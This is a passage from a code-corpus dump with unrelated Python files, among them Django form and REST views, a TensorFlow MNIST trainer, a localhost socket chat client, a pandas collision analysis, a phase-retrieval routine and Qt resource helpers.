LookupError as e:\n m = 'Interface model not found!'\n logger.exception(m)\n error_utils.reraise(e, m)\n\n # Pop the extra kwargs\n interface_id = kwargs.pop('interface_id', None)\n\n # Try to get the right element instance\n try:\n interface = Interface.objects.get(pk=interface_id)\n except ObjectDoesNotExist as e:\n m = 'Interface instance (pk: {interface_id}) not found!'.format(\n interface_id=interface_id,\n )\n logger.exception(m)\n error_utils.reraise(e, m)\n\n # Call super after popping the extra kwargs\n super(InterfaceForm, self).__init__(*args, **kwargs)\n\n # Disable the use of \"required\" key word in html tag\n # to prevent the browser from trying to enforce required fields\n # https://docs.djangoproject.com/en/2.1/ref/forms/api/#django.forms.Form.use_required_attribute\n self.use_required_attribute = False\n\n # Add field for each variable individually\n for i, variable in enumerate(interface.get_input_variables()):\n\n field_name = str(variable.name)\n\n choices = variable.get_choices_tuple()\n\n # For a variable with choices, use (Typed)ChoiceField\n if choices:\n\n # Add an emtpy choice into the choices\n choices = choices + ((None, '. . .'),)\n\n coerce, empty_value = variable.get_coerce_and_empty_value()\n\n if coerce:\n # self.fields[field_name] = forms.TypedChoiceField(\n self.fields[field_name] = TypedChoiceField2(\n label=variable.label,\n choices=choices,\n # widget=variable.get_widget(),\n coerce=coerce,\n empty_value=empty_value,\n required=variable.no_empty_values,\n )\n else:\n # self.fields[field_name] = forms.ChoiceField(\n self.fields[field_name] = ChoiceField2(\n label=variable.label,\n choices=choices,\n # widget=variable.get_widget(),\n required=variable.no_empty_values,\n )\n\n # Without choices, get the appropriate field from the variable\n else:\n field = variable.get_data_value_form_field()\n field.label = variable.label\n field.required = variable.no_empty_values\n # field.widget = variable.get_widget()()\n self.fields[field_name] = field\n\n # Add some extra arguments\n prelabel = None\n postlabel = None\n\n # Set the prelabel if given\n if hasattr(variable, 'prelabel') and variable.prelabel:\n prelabel = variable.prelabel\n\n # Set the postlabel if given\n if hasattr(variable, 'postlabel') and variable.postlabel:\n postlabel = variable.postlabel\n\n # Use units or currency as postlabel if neither prelabel nor postlabel\n if not prelabel and not postlabel:\n if hasattr(variable, 'si_unit') and variable.si_unit:\n if hasattr(variable, 'si_prefix') and variable.si_prefix:\n postlabel = variable.si_prefix + variable.si_unit\n else:\n postlabel = variable.si_unit\n elif hasattr(variable, 'currency') and variable.currency:\n postlabel = variable.currency\n elif hasattr(variable, 'unit') and variable.unit:\n postlabel = variable.unit\n\n self.fields[field_name].prelabel = prelabel\n self.fields[field_name].postlabel = postlabel\n","sub_path":"tdsl/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604679173","text":"'''\nSimple MLP neural network to classify MNIST dataset using ADAM optimiser\n'''\nimport time\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nINPUT_DIMENSIONS = [28, 28, 1]\n# Hyper param\nBATCH_SIZE = 200\nLEARNING_RATE = 1e-4\nEPOCHS = 100\n# Display log messages after every LOG_FREQUENCY iterations during training\nLOG_FREQUENCY = 1\n\n\ndef inference(tp_input, reuse=False):\n \"\"\"\n Construct the neural network structure\n\n :tp_input: Input placeholder\n :return: output logits' expression\n \"\"\"\n with tf.variable_scope('mnist_conv', reuse=reuse):\n te_net = slim.fully_connected(tp_input, 128, activation_fn=tf.nn.relu, reuse=reuse, scope='layer1')\n te_net = slim.fully_connected(te_net, 10, activation_fn=None, reuse=reuse, scope='layer2')\n return te_net\n\n\ndef loss(te_inference, tp_labels):\n \"\"\"\n Construct loss expression\n\n :te_inference: expression for logits\n :tp_labels: placeholder for true labels\n :return: loss expression \n \"\"\"\n return tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tp_labels, logits=te_inference))\n\n\ndef train(te_loss):\n \"\"\"\n Contruct training expression\n\n :te_loss: loss expression\n :return: training expression\n \"\"\"\n tv_global_step = tf.Variable(0, name='global_step_d', trainable=False)\n return slim.learning.create_train_op(te_loss, tf.train.AdamOptimizer(learning_rate=LEARNING_RATE), global_step=tv_global_step)\n\n\ndef accuracy(te_inference, tp_labels):\n \"\"\"\n Construct accuracy expression\n\n :te_inference: expression for logits\n :tp_labels: true label placeholder\n :return: accuracy expression\n \"\"\"\n te_correct_prediction = tf.equal(tf.argmax(te_inference, 1), tf.argmax(tp_labels, 1))\n return tf.reduce_mean(tf.cast(te_correct_prediction, tf.float32))\n\n\ndef placeholders():\n \"\"\"\n Creates placeholders for inputs and labels\n \"\"\" \n tp_input = tf.placeholder(tf.float32, shape=[None, INPUT_DIMENSIONS[0]*INPUT_DIMENSIONS[1]])\n tp_label = tf.placeholder(tf.float32, shape=[None, 10])\n return tp_input, tp_label\n\n\ndef run_training(nepochs):\n \"\"\"\n Train the network for given number of epochs\n \n :nepochs: number of epochs to traing for\n :return: nothing\n \"\"\"\n dataset = input_data.read_data_sets('MNIST_data', one_hot=True)\n with tf.Graph().as_default():\n # Create placeholder\n tp_input, tp_labels = placeholders()\n\n # Create network\n te_inference = inference(tp_input)\n te_loss = loss(te_inference, tp_labels)\n\n # Create train ops\n te_train = train(te_loss)\n te_accuracy = accuracy(te_inference, tp_labels)\n\n # Create session\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n\n # Summaries\n tf.contrib.layers.summarize_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n tf.summary.scalar('loss', te_loss)\n merged = tf.summary.merge_all()\n summary_writer = tf.summary.FileWriter('./summaries_bp', sess.graph)\n saver = tf.train.Saver()\n\n duration = 0\n print('%-10s | %-20s | %-20s | %-10s' % ('Epoch', 'Loss', 'Accuracy', 'Time(s)'))\n print('-' * 86)\n\n for i in range(nepochs):\n for _ in range(int(dataset.train.images.shape[0]/BATCH_SIZE)):\n batch = dataset.train.next_batch(BATCH_SIZE)\n start_time = time.time()\n # Run the training operation and get the loss\n summary, _, val_loss = sess.run([merged, te_train, te_loss], feed_dict={tp_input: batch[0], tp_labels: batch[1],})\n duration += (time.time() - start_time)\n summary_writer.add_summary(summary, i)\n # Logging\n if i % LOG_FREQUENCY == 0:\n batch = dataset.train.next_batch(BATCH_SIZE)\n print('%-10s | %-20s | %-20s | %-10s' % ('%d' % i, '%.5f' % val_loss, '%.5f' % sess.run(te_accuracy, {tp_input: batch[0], tp_labels: batch[1]}), '%.2f' % duration))\n duration = 0\n saver.save(sess, \"./saved_models/mnist_bp.ckpt\")\n\n # Evaluate Final Test Accuracy\n mnist_test_images = dataset.test.images\n mnist_test_labels = dataset.test.labels\n overall_acc = 0.0\n for i in range(0, len(mnist_test_images), BATCH_SIZE):\n overall_acc += sess.run(te_accuracy, {tp_input: mnist_test_images[i:i + BATCH_SIZE], tp_labels: mnist_test_labels[i:i + BATCH_SIZE]})\n print('Final test accuracy: %g' % (overall_acc * BATCH_SIZE / len(mnist_test_images)))\n\nif __name__=='__main__':\n run_training(2000)\n\n","sub_path":"mlp_bp.py","file_name":"mlp_bp.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"352423332","text":"import socket \nfrom colorama import Fore, init, Back;\nfrom threading import *\nimport random \n\ninit()\n\ncolors = [Fore.BLUE, Fore.CYAN, Fore.GREEN, Fore.LIGHTBLACK_EX, \n Fore.LIGHTBLUE_EX, Fore.LIGHTCYAN_EX, Fore.LIGHTGREEN_EX, \n Fore.LIGHTMAGENTA_EX, Fore.LIGHTRED_EX, Fore.LIGHTWHITE_EX, \n Fore.LIGHTYELLOW_EX, Fore.MAGENTA, Fore.RED, Fore.WHITE, Fore.YELLOW\n]\n\nclient_color = random.choice(colors)\n\nclientSocket = socket.socket()\nconnected = False\n\ndef clientListener():\n\twhile True:\n\t\ttry:\n\t\t\tmessage = clientSocket.recv(1024).decode()\n\t\t\tprint(\"\\n\", message)\n\t\texcept socket.error as e:\n\t\t\tclientSocket.close()\n\t\t\tbreak\n\n\nhost = \"localhost\"\nport = 12345\nseprator_token = \"\"\ndisconectMessage = \"!DISCONNECT\"\n\ndef serverConnect():\n\tprint(\"waiting for connection\")\n\ttry:\n\t\tclientSocket.connect((host, port))\n\texcept socket.error as e:\n\t\tprint(str(e))\n\tt = Thread(target=clientListener, args=())\n\tt.daemon = True\n\tt.start()\n\tname = input(\"Enter your name\")\n\tclientSocket.send(name.encode())\n\tprint(\"To quit type q\\ntype receiver username before typing message-username_\\nfor multiple users use username1_username2_...\\nFor sending to all users, type all_\")\n\twhile True:\n\t\tdata = input()\n\t\tif data.lower() == \"q\":\n\t\t\tbreak\n\n\t\tdatasend = f\"{client_color} {name}{seprator_token}{data}{Fore.RESET}\"\n\n\t\tclientSocket.send(datasend.encode())\n\n\tclientSocket.send(disconectMessage.encode())\n\tclientSocket.close()\n\n\n\nwhile True:\n\tprint(\"To connect to the server press c and q to quit the program\")\n\n\ta = input()\n\n\tif a.lower() == \"c\":\n\t\tconnected = True\n\t\tserverConnect()\n\telse:\n\t\tif a.lower() == \"q\":\n\t\t\tbreak\n\n\n\n\n\n","sub_path":"TCP socket/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"86089492","text":"from .controllers import *\n\n\ndef customer_routes(api):\n\n api.add_resource(CustomerHandler, '/v2/customers', endpoint='customers')\n api.add_resource(CustomerUuidHandler, '/v2/customers/', endpoint='customer_by_uuid')\n api.add_resource(CustomerOrderHandler, '/v2/customers//orders', endpoint='customer_orders')\n\n return\n","sub_path":"lesson11/myapp/customer/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"191198576","text":"\n# coding: utf-8\n\n# # Q1_PART ONE\n# NYC VEHICLE COLLISION ANALYSIS\n\n# Use ‘vehicle_collisions’ data set.\n# • For each month in 2016, find out the percentage of collisions in\n# Manhattan out of that year's total accidents in New York City.\n# • Display a few rows of the output use df.head().\n# • Generate a csv output with four columns (‘Month’, ‘Manhattan’, ‘NYC’, ‘Percentage’)\n\n# In[2]:\n\nimport pandas as pd\nfrom pandas import Series, DataFrame\nfrom datetime import datetime,date\n\n\n# In[3]:\n\npath_local='Data/vehicle_collisions.csv'\ndata_raw = pd.read_csv(path_local)\n\n\n# ### Process raw data: only keep date and borough columns\n\n# In[8]:\n\ndf1=data_raw.loc[:,['DATE','BOROUGH']]\n\n\n# ### Extract year and month from date column and put year and month in new columns\n\n# In[10]:\n\ndf1.loc[df1.index,'YEAR']=df1.loc[df1.index,'DATE'].apply(lambda x: datetime.strptime(x,'%m/%d/%y').date().strftime('%y'))\ndf1['MONTH']=df1['DATE'].apply(lambda x: datetime.strptime(x,'%m/%d/%y').date().strftime('%b'))\n\n\n# ### Only keep data in year 2016\n\n# In[11]:\n\ndf1=df1[df1['YEAR']=='16']\n\n\n# ### Get accident information only for Manhattan\n\n# In[13]:\n\ndf0=df1.loc[df1['BOROUGH'] == 'MANHATTAN']\n\n\n# ### Group accident happended in NYC and Manhattan by month\n\n# In[29]:\n\ngroup = df1.groupby(df1['MONTH'])['BOROUGH']\ngroup1 = df0.groupby(df0['MONTH'])['BOROUGH']\n\n\n# ### Count the total accidents in NYC and Manhattan and create data frame for the two boroughs\n\n# In[37]:\n\nseries=group.size()\nseries1=group1.size()\n\n\n# In[38]:\n\ndel series1.index.name\ndf2=DataFrame(series1,columns=['MANHATTAN'])\ndf2.columns.name='MONTH'\n\n\n# In[39]:\n\ndel series.index.name\ndf3=DataFrame(series,columns=['NYC'])\ndf3.columns.name='MONTH'\n\n\n# ### Concate data frames of NYC and Manhattan, reindexing and caculate percentage\n\n# In[40]:\n\nresult=pd.concat([df2,df3],axis=1)\n\n\n# In[41]:\n\nframe=result.reindex(index=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'])\n\n\n# In[42]:\n\nframe['PERCENTAGE']=frame['MANHATTAN']/frame['NYC']\n\n\n# ### A little sample\n\n# In[43]:\n\nframe\n\n\n# ### Put result in csv file\n\n# In[407]:\n\nframe.to_csv('Q1_p1.csv', index_label='MONTH')\n\n\n# In[ ]:\n\n\n\n","sub_path":"Assignment3/Q1_PART_ONE.py","file_name":"Q1_PART_ONE.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"593687745","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Board\nfrom user.models import CustomUser\n\ndef board_read(request):\n boards = Board.objects.all()\n context = {'boards': boards} \n return render(request, 'board/read.html', context)\n\ndef board_read_one(request, pk):\n board = get_object_or_404(Board, pk=pk)\n context = {'board': board}\n return render(request, 'board/read_one.html', context) #권혁상\n\ndef board_create(request):\n if request.method == 'POST' and request.session.get('user', False):\n title = request.POST['title']\n author = get_object_or_404(CustomUser, username=request.session['user'])\n content = request.POST['content']\n \n board = Board(\n author = author,\n title = title,\n content = content)\n board.save()\n\n return redirect('board_read')\n else:\n return render(request, 'board/create.html')\n\ndef board_update(request, pk):\n if request.method == 'POST':\n title = request.POST['title'] \n content = request.POST['content']\n board = Board.objects.get(pk=pk)\n board.title = title\n board.content = content\n board.save()\n return redirect('home') #수정 \n\n else:\n board = get_object_or_404(Board, pk=pk)\n context = {\"board\" : board}\n return render(request, 'board/update.html', context)\n\ndef board_delete(request, pk):\n board = Board.objects.get(pk=pk)\n board.delete()\n return redirect('board_read')","sub_path":"cafe_project/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"7673159","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 15 13:46:27 2021.\n\n@author: quenot\n\"\"\"\nimport numpy as np\nimport frankoChellappa as fc\nfrom scipy.ndimage.filters import gaussian_filter, median_filter\nfrom matplotlib import pyplot as plt\nfrom skimage import color, data, restoration\nfrom phaseIntegration import kottler, LarkinAnissonSheppard\n\n\ndef LCS(experiment):\n \"\"\"Calculates the displacement images from sample and reference images using the LCS system\n \n\n Args:\n experiment (PhaseRetrievalClass): class with all parameters as attributes.\n\n Returns:\n Dx (NUMPY ARRAY): the displacements along x axis.\n Dy (NUMPY ARRAY): the displacements along y axis.\n absoprtion (NUMPY ARRAY): the absorption.\n\n \"\"\"\n\n Nz, Nx, Ny=experiment.reference_images.shape\n LHS=np.ones(((experiment.nb_of_point, Nx, Ny)))\n RHS=np.ones((((experiment.nb_of_point,3, Nx, Ny))))\n solution=np.ones(((3, Nx, Ny)))\n\n #Prepare system matrices\n for i in range(experiment.nb_of_point):\n #Right handSide\n gX_IrIr,gY_IrIr=np.gradient(experiment.reference_images[i])\n RHS[i]=[experiment.sample_images[i],gX_IrIr, gY_IrIr]\n LHS[i]=experiment.reference_images[i]\n\n #Solving system for each pixel \n for i in range(Nx):\n for j in range(Ny):\n a=RHS[:,:,i,j]\n b=LHS[:,i,j]\n Q,R = np.linalg.qr(a) # qr decomposition of A\n Qb = np.dot(Q.T,b) # computing Q^T*b (project b onto the range of A)\n \n if R[2,2]==0 or R[1,1]==0 or R[0,0]==0:\n temp=[1,0,0]\n else:\n temp = np.linalg.solve(R,Qb) # solving R*x = Q^T*b\n solution[:,i,j]=temp\n \n absoprtion=1/solution[0]\n Dx=solution[1]\n Dy=solution[2]\n \n #Bit of post-processing\n #Limiting displacement to a threshold\n displacementLimit=experiment.max_shift\n Dx[Dx<-displacementLimit]=-displacementLimit\n Dx[Dx>displacementLimit]=displacementLimit\n Dy[Dy<-displacementLimit]=-displacementLimit\n Dy[Dy>displacementLimit]=displacementLimit\n #Trying different filters\n if experiment.LCS_median_filter !=0:\n Dx=median_filter(Dx,size=experiment.LCS_median_filter)\n Dy=median_filter(Dy,size=experiment.LCS_median_filter)\n \n return Dx, Dy, absoprtion\n\n\ndef processProjectionLCS(experiment):\n \"\"\"launches calculation of displacement maps and phase images from LCS, FC, LA and K.\n \n Args:\n experiment (PHASERETRIEVALCLASS): class of the experiment.\n\n Returns:\n dict | NUMPY ARRAY : contains all the calculated images.\n\n \"\"\"\n experiment.nb_of_point, Nx, Ny= experiment.sample_images.shape\n \n dx, dy , absorption =LCS(experiment)\n\n # Compute the phase gradient from displacements (linear relationship)\n # magnification=(experiment['distSO']+experiment['distOD'])/experiment['distSO'] #Not sure I need to use this yet\n \n print(\"experiment pixel\", experiment.pixel)\n print(\"distance object detector\", experiment.dist_object_detector)\n print(\"k\", experiment.getk())\n \n \n dphix=dx*(experiment.pixel/experiment.dist_object_detector)*experiment.getk()\n dphiy=dy*(experiment.pixel/experiment.dist_object_detector)*experiment.getk()\n \n padForIntegration=True\n padSize=1000\n if padForIntegration:\n dphix = np.pad(dphix, ((padSize, padSize), (padSize, padSize)),mode='reflect') # voir is edge mieux que reflect\n dphiy = np.pad(dphiy, ((padSize, padSize), (padSize, padSize)),mode='reflect') # voir is edge mieux que reflect\n \n # Compute the phase from phase gradients with 3 different methods (still trying to choose the best one)\n phiFC = fc.frankotchellappa(dphiy, dphix, True)*experiment.pixel\n phiK = kottler(dphiy, dphix)*experiment.pixel\n phiLA = LarkinAnissonSheppard(dphiy, dphix)*experiment.pixel\n \n if padSize > 0:\n phiFC = phiFC[padSize:padSize + Nx, padSize:padSize + Ny]\n phiK = phiK[padSize:padSize + Nx , padSize:padSize + Ny]\n phiLA = phiLA[padSize:padSize + Nx, padSize:padSize + Ny]\n\n return {'dx': dx, 'dy': dy, 'phiFC': phiFC.real, 'phiK': phiK.real,'phiLA': phiLA.real, 'absorption':absorption}\n \n \n\n","sub_path":"popcorn/phase_retrieval/LCS.py","file_name":"LCS.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"343990682","text":"# -*- coding: utf-8 -*-\n# __author__ = 'XingHuan'\n# 4/4/2018\n\n# Copyright 2018 XingHuan\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport sys\nfrom sins.module.sqt import *\nfrom sins.utils.const import declare_constants\nfrom sins.utils.cache import sins_cached\nfrom sins.utils.log import get_logger\n\n\nuseRes = False\ntry:\n import respy1\n useRes = True\nexcept ImportError:\n pass\n\n\nlogger = get_logger(__name__)\n\nRes_Folder = '/'.join(__file__.replace('\\\\', '/').split('/')[:-3]) + '/resource'\n\nicon = declare_constants(\n Shot=\"icon/Shot.png\",\n Shot_B=\"icon/Shot_bright.png\",\n Sequence=\"icon/Sequence.png\",\n Sequence_B=\"icon/Sequence_bright.png\",\n Media=\"icon/Media.png\",\n Task=\"icon/Task.png\",\n Task_B=\"icon/Task.png\",\n Asset=\"icon/Asset.png\",\n Asset_B=\"icon/Asset_bright.png\",\n File=\"icon/File.png\",\n # File_B=\"icon/File_bright.png\",\n Tag=\"icon/Tag.png\",\n Department=\"icon/Department.png\",\n Department_B=\"icon/Department_bright.png\",\n PermissionGroup=\"icon/PermissionGroup.png\",\n PermissionGroup_B=\"icon/PermissionGroup_bright.png\",\n Status=\"icon/Status.png\",\n ApiUser=\"icon/ApiUser.png\",\n Person=\"icon/Person.png\",\n Person_B=\"icon/Person_bright.png\",\n Group=\"icon/Group.png\",\n Group_B=\"icon/Group_bright.png\",\n PipelineStep=\"icon/PipelineStep.png\",\n PipelineStep_B=\"icon/PipelineStep_bright.png\",\n Project=\"icon/Project.png\",\n Note=\"icon/Note.png\",\n AssetType=\"icon/AssetType.png\",\n AssetType_B=\"icon/AssetType_bright.png\",\n Timelog=\"icon/Timelog.png\",\n Playlist=\"icon/Playlist.png\",\n Playlist_B=\"icon/Playlist.png\",\n Version=\"icon/Version.png\",\n Movie=\"icon/file_video_gray.png\",\n Frame=\"icon/file_sequence_gray.png\",\n)\n\n\nerror_pic = declare_constants(\n Error01=os.path.join(Res_Folder, 'other', 'Error01.png'),\n Error02=os.path.join(Res_Folder, 'other', 'Error02.png'),\n)\n\n\ndef get_pic(*args):\n if useRes:\n return \":res/\" + \"/\".join(list(args))\n else:\n return os.path.join(Res_Folder, *args).replace('\\\\', '/')\n\n\ndef get_qicon(*args):\n return QIcon(get_pic(*args))\n\n\n# def get_pixmap(*args, **kwargs):\n# \"\"\"\n# return QPixmap object based on name and scale\n# :param name: pic name\n# :param scale: scale factor, list or int\n# :return: QPixmap\n# \"\"\"\n# if \"scale\" not in kwargs:\n# if os.path.exists(args[0]):\n# return QPixmap(args[0])\n# return QPixmap(get_pic(*args))\n# else:\n# scale = kwargs[\"scale\"]\n# if isinstance(scale, list):\n# if os.path.exists(args[0]):\n# return QPixmap(args[0]).scaled(scale[0], scale[1], Qt.KeepAspectRatio, Qt.SmoothTransformation)\n# return QPixmap(get_pic(*args)).scaled(scale[0], scale[1], Qt.KeepAspectRatio, Qt.SmoothTransformation)\n# else:\n# if os.path.exists(args[0]):\n# return QPixmap(args[0]).scaled(scale, scale, Qt.KeepAspectRatio, Qt.SmoothTransformation)\n# return QPixmap(get_pic(*args)).scaled(scale, scale, Qt.KeepAspectRatio, Qt.SmoothTransformation)\n\n\ndef get_pixmap(*args, **kwargs):\n \"\"\"\n return QPixmap object based on name and scale\n :param name: pic name\n :param scale: scale factor, list or int\n :return: QPixmap\n \"\"\"\n path = args[0] if os.path.isfile(args[0]) else get_pic(*args)\n scale = kwargs.get('scale')\n aspect = kwargs.get('aspect', 'keep')\n color = kwargs.get('color')\n error = kwargs.get('error', 'Error01')\n clip = kwargs.get('clip')\n\n if isinstance(scale, QSize):\n pass\n elif isinstance(scale, (list, tuple)):\n scale = QSize(scale[0], scale[1])\n elif isinstance(scale, int):\n scale = QSize(scale, scale)\n\n if isinstance(color, QColor):\n pass\n elif color == \"auto\":\n color = QApplication.instance().palette().text().color()\n elif isinstance(color, basestring):\n color = QColor(color)\n elif isinstance(color, int):\n color = QColor(color)\n elif isinstance(color, list):\n color = QColor(color[0], color[1], color[2])\n elif isinstance(color, QWidget):\n widget = color\n is_enabled = widget.isEnabled()\n if not is_enabled:\n widget.setEnabled(True)\n color = widget.palette().text().color()\n if not is_enabled:\n widget.setEnabled(is_enabled)\n\n if path.endswith(\"svg\"):\n svg = QtSvg.QSvgRenderer(path)\n if not scale:\n scale = svg.defaultSize()\n\n img = QImage(scale, QImage.Format_ARGB32)\n painter = QPainter()\n painter.begin(img)\n\n if not color:\n color = QApplication.palette().text().color()\n\n if color:\n painter.setCompositionMode(QPainter.CompositionMode_Plus)\n painter.fillRect(img.rect(), color)\n painter.setCompositionMode(QPainter.CompositionMode_SourceOut)\n svg.render(painter)\n if color:\n painter.fillRect(img.rect(), color)\n painter.end()\n pixmap = QPixmap.fromImage(img)\n\n else:\n img = QImage(path)\n if img.width() == 0:\n logger.warning('error image: \"{}\"'.format(path))\n img = QImage(getattr(error_pic, error))\n if scale:\n if aspect == 'keep':\n img = img.scaled(scale, Qt.KeepAspectRatio, Qt.SmoothTransformation)\n elif aspect == 'expand':\n img = img.scaled(scale, Qt.KeepAspectRatioByExpanding, Qt.SmoothTransformation)\n elif aspect == 'width':\n img = img.scaledToWidth(scale.width(), Qt.SmoothTransformation)\n elif aspect == 'height':\n img = img.scaledToHeight(scale.height(), Qt.SmoothTransformation)\n if color:\n img = img.convertToFormat(QImage.Format_Indexed8)\n if img.depth() in [1, 8]:\n for index in range(img.colorCount()):\n src_color = QColor.fromRgba(img.color(index))\n img.setColor(index, QColor(color.red(), color.green(), color.blue(),\n src_color.alpha()).rgba())\n else:\n for row in range(img.height()):\n # print img.scanLine(row)\n # print len(img.scanLine(row))\n # help(img.scanLine(row))\n # for pix in img.scanLine(row):\n # print pix\n for col in range(img.width()):\n src_color = QColor.fromRgba(img.pixel(col, row))\n if not src_color.alpha():\n continue\n img.setPixel(col, row, color.rgb())\n\n pixmap = QPixmap.fromImage(img)\n\n if clip and isinstance(clip, (list, tuple)):\n pixmap = pixmap.copy(*clip)\n\n return pixmap\n\n\n@sins_cached()\ndef get_style(name):\n if useRes:\n cssFile = QFile(\":res/style/%s.css\" % name)\n cssFile.open(QFile.ReadOnly)\n css = cssFile.readAll().data()\n cssFile.close()\n css = css.replace(\"%s\", \":res\")\n return css\n else:\n styleFile = os.path.join(Res_Folder, \"style\", \"%s.css\" % name)\n styleText = open(styleFile).read()\n styleText = styleText.replace(\"%s\", Res_Folder)\n styleText = styleText.replace(\"\\\\\", \"/\")\n # print styleText\n return styleText\n\n\ndef get_styles(*names):\n style = ''\n for name in names:\n style += get_style(name)\n return style\n\n\ndef get_qmovie(*args):\n return QMovie(get_pic(*args))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n # print get_pic(\"player\", \"aaa.png\")\n # print get_pixmap(\"player\", \"aaa.png\")\n # print get_pixmap('F:/Temp/pycharm/Sins_data/sins/File/0000/0000/0015/DRM.jpg', scale=[100, 70])\n # print get_style(\"main_gui\")\n label = QLabel()\n movie = get_qmovie('gif', 'loading0.gif')\n label.setMovie(movie)\n movie.start()\n label.show()\n app.exec_()\n","sub_path":"sins/utils/res/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"71823654","text":"#!/usr/bin/env python3\nfrom sys import argv\nfrom sympy.ntheory.modular import crt\n\nfilename = argv[1]\nwith open(filename) as f:\n start_time = int(f.readline().rstrip())\n ids_raw = f.readline().rstrip().split(',')\n ids = [int(i) for i in ids_raw if i != 'x']\n v = [(int(id_raw)-i) % int(id_raw) for i, id_raw in enumerate(ids_raw) if id_raw != 'x']\n\ni = 0\nfound = False\nwhile not found:\n t = start_time + i\n for x in ids:\n if t % x == 0:\n print('Part 1:', i * x)\n found = True\n break\n i += 1\n\nprint('Part 2:', crt(ids, v)[0])\n","sub_path":"day13/shuttle_search.py","file_name":"shuttle_search.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"290424129","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.db.models import Count\n# from django.core.paginator import Paginator\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .serializers import GenreSerializer\nfrom .models import Genre, Movie, Comment\nfrom .serializers import MovieSerializer, MovieListSerializer, GenreListSerializer, CommentSerializer,CommentListSerializer\nfrom .serializers import RecommendationSerializer\n\n# from django.contrib.auth.decorators import login_required\n# from django.http import JsonResponse\n\n\n# Create your views here.\nAPI_KEY = '611b17e08929eff3b420b33f2d24c4bb'\n\n@api_view(['GET'])\ndef index(request):\n movies = Movie.objects.all()\n serializer = MovieListSerializer(movies, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef movie_genre(request, genre_pk):\n genre = get_object_or_404(Genre, pk=genre_pk)\n print(genre)\n movies = Movie.objects.filter(genres_ids=genre).all()\n print(movies)\n serializer = MovieListSerializer(movies, many=True)\n return Response(serializer.data)\n \n\n@api_view(['GET'])\ndef detail(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n serializer = MovieSerializer(movie)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef add_movie(request):\n serializer = MovieSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.error)\n\n@api_view(['DELETE'])\ndef delete_movie(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n movie.delete()\n return Response(status=200)\n\n@api_view(['PUT'])\ndef modify_movie(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n serializer = MovieSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.error)\n\ndef like(request):\n pass\n\n@api_view(['GET'])\ndef get_genre(request):\n genres = Genre.objects.all()\n serializer = GenreSerializer(genres, many=True)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef add_genre(request):\n serializer = GenreListSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(status=400)\n \n@api_view(['POST'])\n#@permission_classes([IsAuthenticated])\ndef delete_genre(request, genre_pk):\n genre = get_object_or_404(Genre, pk=genre_pk)\n genre.delete()\n return Response(status=200)\n \n\n@api_view(['PUT'])\ndef modify_genre(request, genre_pk):\n genre = get_object_or_404(Genre, pk=genre_pk)\n serializer = GenreListSerializer(genre, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(status=200)\n\n\n@api_view(['POST'])\ndef create_comment(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n serializer = CommentSerializer(data=request.data)\n if serializer.is_valid():\n user = request.user\n serializer.save(movie_id=movie, user=user)\n return Response(serializer.data)\n \n\n@api_view(['GET'])\ndef get_comments(request,movie_pk):\n comments = Comment.objects.filter(movie_id=movie_pk).order_by('-pk')\n serializer = CommentListSerializer(comments,many=True)\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef delete_comment(reqeust, comment_pk):\n comment = get_object_or_404(Comment, 